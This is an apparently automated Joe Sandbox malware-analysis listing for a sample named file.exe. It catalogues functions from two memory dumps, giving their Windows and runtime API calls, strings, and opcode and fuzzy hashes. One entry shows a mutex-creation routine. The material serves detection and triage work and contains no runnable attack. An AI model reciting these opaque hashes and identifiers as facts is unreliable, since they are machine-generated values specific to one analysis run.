                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Proxy::Scheduler$AffinityThread$Concurrency::details::platform::__CoreCurrentExecutionGroupHardwareIncrement$Affinity::BorrowedCountEventFixedListResourceResource::StateSubscriptionToggle
                    • String ID:
                    • API String ID: 318399070-0
                    • Opcode ID: e8a399636c21c93f54abecb38cd00bd2a0cdd3abe99d6541657663b6aa6b27b5
                    • Instruction ID: fe86043d0ec5758fdeb7fa1791ef53b29c71cd57ba806e603e01c4068b965251
                    • Opcode Fuzzy Hash: e8a399636c21c93f54abecb38cd00bd2a0cdd3abe99d6541657663b6aa6b27b5
                    • Instruction Fuzzy Hash: 8E21B031600B249FCB24EF66E9508BBF3F4FF48304740455EE942A7651CB78E905CBAA
                    Function 044F52AF Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(?,?,044F52A6,044F3E67,044DB8CC,00462014,?,00000000,0044B448,000000FF,?,044C2651,?,?), ref: 044F52BD
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 044F52CB
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 044F52E4
                    • SetLastError.KERNEL32(00000000,?,044F52A6,044F3E67,044DB8CC,00462014,?,00000000,0044B448,000000FF,?,044C2651,?,?), ref: 044F5336
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: b07de53ced0629e77d54eea71d233bc361282fd8b55c12240ca057c3c3e4afae
                    • Instruction ID: fe1c550c639fed95819e0843187fd72fabcd4d81309bf716c56bcf8e9be9b80a
                    • Opcode Fuzzy Hash: b07de53ced0629e77d54eea71d233bc361282fd8b55c12240ca057c3c3e4afae
                    • Instruction Fuzzy Hash: A801B53260DB217EFF252BB97C8556B2745EB01679721033FE314855E3FFE168029649
                    Function 00435048 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(?,?,0043503F,00433C00,0041B665,1F0F83C3,?,00000000,0044B448,000000FF,?,004023EA,?,?), ref: 00435056
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00435064
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043507D
                    • SetLastError.KERNEL32(00000000,?,0043503F,00433C00,0041B665,1F0F83C3,?,00000000,0044B448,000000FF,?,004023EA,?,?), ref: 004350CF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: b07de53ced0629e77d54eea71d233bc361282fd8b55c12240ca057c3c3e4afae
                    • Instruction ID: 8d24dae537e6274fcf49c1697837548d04e0bffea64ecaf3a521acfb1b817ace
                    • Opcode Fuzzy Hash: b07de53ced0629e77d54eea71d233bc361282fd8b55c12240ca057c3c3e4afae
                    • Instruction Fuzzy Hash: 9A01453220EF226EA22826756C81A1B2665EB09738F30223FF224451E1FECB480092CD
                    Function 044DFF92 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 044DFFA0
                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 044DFFA6
                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 044DFFD3
                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 044DFFDD
                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 044DFFEF
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 044E0005
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                    • String ID:
                    • API String ID: 2808382621-0
                    • Opcode ID: c0a4f277fe568b30ff606a76a18e0e24afb7e465af144ec3c514b72e4719e68f
                    • Instruction ID: 1cd92c6a2ab7665081bd8e8edb4d8605347a9653af97e9ffbf1b45d031a24e14
                    • Opcode Fuzzy Hash: c0a4f277fe568b30ff606a76a18e0e24afb7e465af144ec3c514b72e4719e68f
                    • Instruction Fuzzy Hash: B601D435600215ABEF24AB77EC08BBB3768AF4175BB10082BF812E1192EB64F5088764
                    Function 0041FD2B Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0041FD39
                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0041FD3F
                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0041FD6C
                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0041FD76
                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0041FD88
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041FD9E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                    • String ID:
                    • API String ID: 2808382621-0
                    • Opcode ID: c0a4f277fe568b30ff606a76a18e0e24afb7e465af144ec3c514b72e4719e68f
                    • Instruction ID: 4f3bf0f7770c7e5986951e0f5cc567661e6afe5f20b1112d50d855a3cbefbd6a
                    • Opcode Fuzzy Hash: c0a4f277fe568b30ff606a76a18e0e24afb7e465af144ec3c514b72e4719e68f
                    • Instruction Fuzzy Hash: B401FC3554021567DB10ABB2FC05BFF3768EF41712B10483BF402D1152DB2CE94A876D
                    Function 045029F9 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 171timeCOMMON
                    Download Yara Rule
                    APIs
                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00456758), ref: 04502A63
                    • _free.LIBCMT ref: 04502A51
                      • Part of subcall function 044FB0FC: HeapFree.KERNEL32(00000000,00000000,?,044FF3D7,?,00000000,?,?,?,044FF3FE,?,00000007,?,?,044FF800,?), ref: 044FB112
                      • Part of subcall function 044FB0FC: GetLastError.KERNEL32(?,?,044FF3D7,?,00000000,?,?,?,044FF3FE,?,00000007,?,?,044FF800,?,?), ref: 044FB124
                    • _free.LIBCMT ref: 04502C1D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                    • String ID: XgE$XgE
                    • API String ID: 2155170405-1765908331
                    • Opcode ID: 758bdd31560fefc84b9d53b96a8230aeae10257a8ae30227f876927d3a6ffae1
                    • Instruction ID: b1fcf955d841a34af023abd679c341163e2a87c4119b38e741bd3fafcd78e346
                    • Opcode Fuzzy Hash: 758bdd31560fefc84b9d53b96a8230aeae10257a8ae30227f876927d3a6ffae1
                    • Instruction Fuzzy Hash: 9E511A79900205ABDB20EF65EC859AAB7B8FF40314F1186EAF510A31D0FBB0BD40AB55
                    Function 0040DB90 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 154COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: mtx_do_lock
                    • String ID: list too long
                    • API String ID: 1389037287-1124181908
                    • Opcode ID: bb80dab446aa7d14bc6a9cac732c978a2268850f800d367491a8692ac82611e5
                    • Instruction ID: 0e9caaf664b056db8b3abed6a1863efd26c2cb81634f27bb393a251f38098771
                    • Opcode Fuzzy Hash: bb80dab446aa7d14bc6a9cac732c978a2268850f800d367491a8692ac82611e5
                    • Instruction Fuzzy Hash: C551DB71D44718ABDB20DF65CC86BDAB3B8EF14704F0041ABF81DA7281E778AD858B59
                    Function 00434F2B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87COMMON
                    Download Yara Rule
                    APIs
                    • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00434F7E
                    • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00434F97
                    • PMDtoOffset.LIBCMT ref: 00434FBD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: FindInstanceTargetType$Offset
                    • String ID: Bad dynamic_cast!
                    • API String ID: 1467055271-2956939130
                    • Opcode ID: 0521f5f12162b5f940dd835c7097114a2cc624e250e977d47238f7f30b439742
                    • Instruction ID: c3d998d34e3c5e6d783fab50cb8decc3bcb55afa041ecdf7956987aee26e1d96
                    • Opcode Fuzzy Hash: 0521f5f12162b5f940dd835c7097114a2cc624e250e977d47238f7f30b439742
                    • Instruction Fuzzy Hash: CB212732A04205AFDF14DF64D906EEE77A4EBCC724F24521BF90493280DB39FD0186A9
                    Function 00431938 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85threadCOMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00431993
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004319B2
                    • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 004319F9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$ExecutionFreeIdleProcessorProxy::Root::SpinSuspendThreadUntilVirtualstd::invalid_argument::invalid_argument
                    • String ID: pContext
                    • API String ID: 1284976207-2046700901
                    • Opcode ID: 7696fed31027723f35f026be7f56ee9a288ab6992535e51fad3a21373ee75dd4
                    • Instruction ID: 1c2ff945bfb3779234e5a6cf3f9012e4fdc6cf8487c5ad4306e8c2bd46a22409
                    • Opcode Fuzzy Hash: 7696fed31027723f35f026be7f56ee9a288ab6992535e51fad3a21373ee75dd4
                    • Instruction Fuzzy Hash: 52212935700215ABCB18AB25D8A4B7E73A5BF98335F04116BE511873F2CF6CAC45CA99
                    Function 044FE2ED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                    Download Yara Rule
                    Strings
                    • C:\Users\user\Desktop\file.exe, xrefs: 044FE2F2
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: C:\Users\user\Desktop\file.exe
                    • API String ID: 0-3695852857
                    • Opcode ID: c2b0de2763c86ad6614d27659a9b599b6b937d4051c2e6d32a144a313df7ce7a
                    • Instruction ID: b09d3e736b9c4b870718be87de731fe365336532378017fac3500ac75ab54279
                    • Opcode Fuzzy Hash: c2b0de2763c86ad6614d27659a9b599b6b937d4051c2e6d32a144a313df7ce7a
                    • Instruction Fuzzy Hash: FF218371600605AFEF20AF62DC84D6B775DEB0026A720452AFB1D972A1FF35FC418BA1
                    Function 0043E086 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                    Download Yara Rule
                    Strings
                    • C:\Users\user\Desktop\file.exe, xrefs: 0043E08B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: C:\Users\user\Desktop\file.exe
                    • API String ID: 0-3695852857
                    • Opcode ID: d976a1582a0ea40e6d34111d7caa758c1d1378cc5cd5895febd347388f405018
                    • Instruction ID: f4dc822ff7adfef32422cf1d068892eb60ac2f919edbcc6374e1cafa7be57565
                    • Opcode Fuzzy Hash: d976a1582a0ea40e6d34111d7caa758c1d1378cc5cd5895febd347388f405018
                    • Instruction Fuzzy Hash: C121C5B1605215BFDB206F639C81E6777BDEF08368F20651AF52497381E779EC408BA8
                    Function 004372A9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _wcsrchr
                    • String ID: .bat$.cmd$.com$.exe
                    • API String ID: 1752292252-4019086052
                    • Opcode ID: 76ed5b3c9a0d73b5894b50308dce038bad0a816de482078dd29a63f31f2b0ceb
                    • Instruction ID: d16564c9a29a3a8969ec7240e5edfb42ca856ad351659fd50751cb54bcf8bce3
                    • Opcode Fuzzy Hash: 76ed5b3c9a0d73b5894b50308dce038bad0a816de482078dd29a63f31f2b0ceb
                    • Instruction Fuzzy Hash: 23010867608616312635A0199C02B7B57988F9ABB4F25102FFC94F76C3DE8CDC0291EC
                    Function 00424FB2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 74COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::SchedulingNode::AddVirtualProcessor.LIBCONCRT ref: 00425011
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00425034
                    • Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 00425076
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CacheConcurrency::details::GroupLocalSchedule$Node::ProcessorSchedulingSegmentSegment::Virtualstd::invalid_argument::invalid_argument
                    • String ID: count$ppVirtualProcessorRoots
                    • API String ID: 18808576-3650809737
                    • Opcode ID: ee74751cda2579e54f441aeaee73b0045bcbbb17f9a78e7efd1f60961086b841
                    • Instruction ID: 305bc4034c2cb983e96c2d8fe25bce993a68233bb1d7dc822cb2e33d84effcaf
                    • Opcode Fuzzy Hash: ee74751cda2579e54f441aeaee73b0045bcbbb17f9a78e7efd1f60961086b841
                    • Instruction Fuzzy Hash: 6821E035B00225EFCB04EF69D881AAD73A1FF48304F50402FE90597691DF75AE01CB89
                    Function 044FA978 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(?,?,?,044F6CC1,?,?,?,?,044F78F5,?), ref: 044FA97D
                    • _free.LIBCMT ref: 044FA9DA
                    • _free.LIBCMT ref: 044FAA10
                    • SetLastError.KERNEL32(00000000,00462170,000000FF,?,?,044F6CC1,?,?,?,?,044F78F5,?), ref: 044FAA1B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast_free
                    • String ID: x!F
                    • API String ID: 2283115069-3062043068
                    • Opcode ID: 826befe5908a36a329c0b68ecd7869063ec108b53a76503526fd19857e2e3b2b
                    • Instruction ID: e121d2cc9ce6a816ddf4ab89f65e7413dd27dd45986cc7de4a454dc214eedbf5
                    • Opcode Fuzzy Hash: 826befe5908a36a329c0b68ecd7869063ec108b53a76503526fd19857e2e3b2b
                    • Instruction Fuzzy Hash: 82112C32704A00FEEF2167B6EC84D2B2199DBC2779B25063BF328A21E1ED61BC064116
                    Function 0043A711 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(?,?,?,00436A5A,?,?,?,?,0043768E,?), ref: 0043A716
                    • _free.LIBCMT ref: 0043A773
                    • _free.LIBCMT ref: 0043A7A9
                    • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,00436A5A,?,?,?,?,0043768E,?), ref: 0043A7B4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast_free
                    • String ID: x!F
                    • API String ID: 2283115069-3062043068
                    • Opcode ID: 826befe5908a36a329c0b68ecd7869063ec108b53a76503526fd19857e2e3b2b
                    • Instruction ID: be7c44a1fb34d1c37a26770ceb7c848a23a0808e2611b486d4a83bfcf4870b79
                    • Opcode Fuzzy Hash: 826befe5908a36a329c0b68ecd7869063ec108b53a76503526fd19857e2e3b2b
                    • Instruction Fuzzy Hash: 9A110D312847003AD61127755CC6E2B2169D7D9379F25213FF360862D1EFADCC16425F
                    Function 044FAACF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(?,?,?,044F788F,044C246E), ref: 044FAAD4
                    • _free.LIBCMT ref: 044FAB31
                    • _free.LIBCMT ref: 044FAB67
                    • SetLastError.KERNEL32(00000000,00462170,000000FF,?,044F788F,044C246E), ref: 044FAB72
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast_free
                    • String ID: x!F
                    • API String ID: 2283115069-3062043068
                    • Opcode ID: c8ad822cd170ee70e40dfd3b9bf10ba13b5f2f5e684597da726ebd4380a789db
                    • Instruction ID: 77c1258835eefb62526eb2fff6cdbe0c449defc09781fa53a2720c5499316cd5
                    • Opcode Fuzzy Hash: c8ad822cd170ee70e40dfd3b9bf10ba13b5f2f5e684597da726ebd4380a789db
                    • Instruction Fuzzy Hash: A8110C35714B01FEEF216B76AC84D6B259EDBC2779B14023BF728A22E1EDA1BC064115
                    Function 0043A868 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(?,?,?,00437628,00402207), ref: 0043A86D
                    • _free.LIBCMT ref: 0043A8CA
                    • _free.LIBCMT ref: 0043A900
                    • SetLastError.KERNEL32(00000000,00000008,000000FF,?,00437628,00402207), ref: 0043A90B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast_free
                    • String ID: x!F
                    • API String ID: 2283115069-3062043068
                    • Opcode ID: c8ad822cd170ee70e40dfd3b9bf10ba13b5f2f5e684597da726ebd4380a789db
                    • Instruction ID: b986b1826898f37416bf5ced70f3374c8b36f31c2da29752778e1ed8a3b37dc0
                    • Opcode Fuzzy Hash: c8ad822cd170ee70e40dfd3b9bf10ba13b5f2f5e684597da726ebd4380a789db
                    • Instruction Fuzzy Hash: 5A112C312847003AC61573755C42F2B2259EBC93B9F24213FF264962D1EA6D8C17411F
                    Function 004360C7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: api-ms-
                    • API String ID: 0-2084034818
                    • Opcode ID: 0f756fd091728f1714fffd2efd6505197b9063550eda6cdbc8ad120b831c3f96
                    • Instruction ID: 24afc57fe78e1c6608cbdf562ed4d7e6d93aa0af096ef472e59e5906e3cd28f5
                    • Opcode Fuzzy Hash: 0f756fd091728f1714fffd2efd6505197b9063550eda6cdbc8ad120b831c3f96
                    • Instruction Fuzzy Hash: 7E110F31A01326BBCF324B68DC44A1F77659F09771F225123ED16A7392D674ED00C6E8
                    Function 044F240C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON
                    Download Yara Rule
                    APIs
                    • StructuredWorkStealingQueue.LIBCMT ref: 044F242C
                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 044F243D
                    • StructuredWorkStealingQueue.LIBCMT ref: 044F2473
                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 044F2484
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured
                    • String ID: e
                    • API String ID: 3804418703-4024072794
                    • Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                    • Instruction ID: 841be8bd8d3f76f991b1095c36ed4c8f9a13355bdaa07f55669fdce0425dba7b
                    • Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                    • Instruction Fuzzy Hash: ED11CA31200205ABEF24DE6DCC8176B77A4BF02255B14C5EBED069F252DBF2F9018BA1
                    Function 004321A5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON
                    Download Yara Rule
                    APIs
                    • StructuredWorkStealingQueue.LIBCMT ref: 004321C5
                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004321D6
                    • StructuredWorkStealingQueue.LIBCMT ref: 0043220C
                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0043221D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured
                    • String ID: e
                    • API String ID: 3804418703-4024072794
                    • Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                    • Instruction ID: 9b603a7df0a9b275827e5962de0d870e8733e561ac416f5c4f25b928dcbe72b5
                    • Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                    • Instruction Fuzzy Hash: D911E7311001019BDF55DE69DF41A6B73A49F0A364F1890ABEC069F202CAB9D901CB99
                    Function 044CAB97 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55sleepsynchronizationCOMMON
                    Download Yara Rule
                    APIs
                    • Sleep.KERNEL32(00000064), ref: 044CAB9A
                    • CreateMutexA.KERNEL32(00000000,00000000,00463224), ref: 044CABB8
                    • GetLastError.KERNEL32 ref: 044CABC0
                    • GetLastError.KERNEL32 ref: 044CABD1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$CreateMutexSleep
                    • String ID: $2F
                    • API String ID: 3645482037-2999617530
                    • Opcode ID: abf828106290c8285b3a59e7965c404706129166012535d5085106ddaca65b9d
                    • Instruction ID: 84d255a525831a3e33a321f8ae39f34a677cf6d5740d445a54ee46c252c4b70c
                    • Opcode Fuzzy Hash: abf828106290c8285b3a59e7965c404706129166012535d5085106ddaca65b9d
                    • Instruction Fuzzy Hash: 8501F435540304EBEB509F68FC08F5A77B5E704F12F500A3AF615D76D0EB78A444872A
                    Function 0043667D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00436672,?,?,0043663A,?,?,?), ref: 00436692
                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004366A5
                    • FreeLibrary.KERNEL32(00000000,?,?,00436672,?,?,0043663A,?,?,?), ref: 004366C8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressFreeHandleLibraryModuleProc
                    • String ID: CorExitProcess$mscoree.dll
                    • API String ID: 4061214504-1276376045
                    • Opcode ID: 149a4b1e0247f71675fe1653e9c2ac55fef454062cb741321ed7f61413657623
                    • Instruction ID: a844e345ecaf6b3645b807ab58af657e8cb037a566189496e486508311f4ef5d
                    • Opcode Fuzzy Hash: 149a4b1e0247f71675fe1653e9c2ac55fef454062cb741321ed7f61413657623
                    • Instruction Fuzzy Hash: 8EF08235501319FBCB119B91DD0EB9E7A79EB04797F104062FC04A22A1CB78CE04DB9C
                    Function 00446849 Relevance: 7.7, APIs: 5, Instructions: 244COMMON
                    Download Yara Rule
                    APIs
                    • GetCPInfo.KERNEL32(029512F8,029512F8,?,7FFFFFFF,?,?,00446B05,029512F8,029512F8,?,029512F8,?,?,?,?,029512F8), ref: 004468EC
                    • __alloca_probe_16.LIBCMT ref: 004469A2
                    • __alloca_probe_16.LIBCMT ref: 00446A38
                    • __freea.LIBCMT ref: 00446AA3
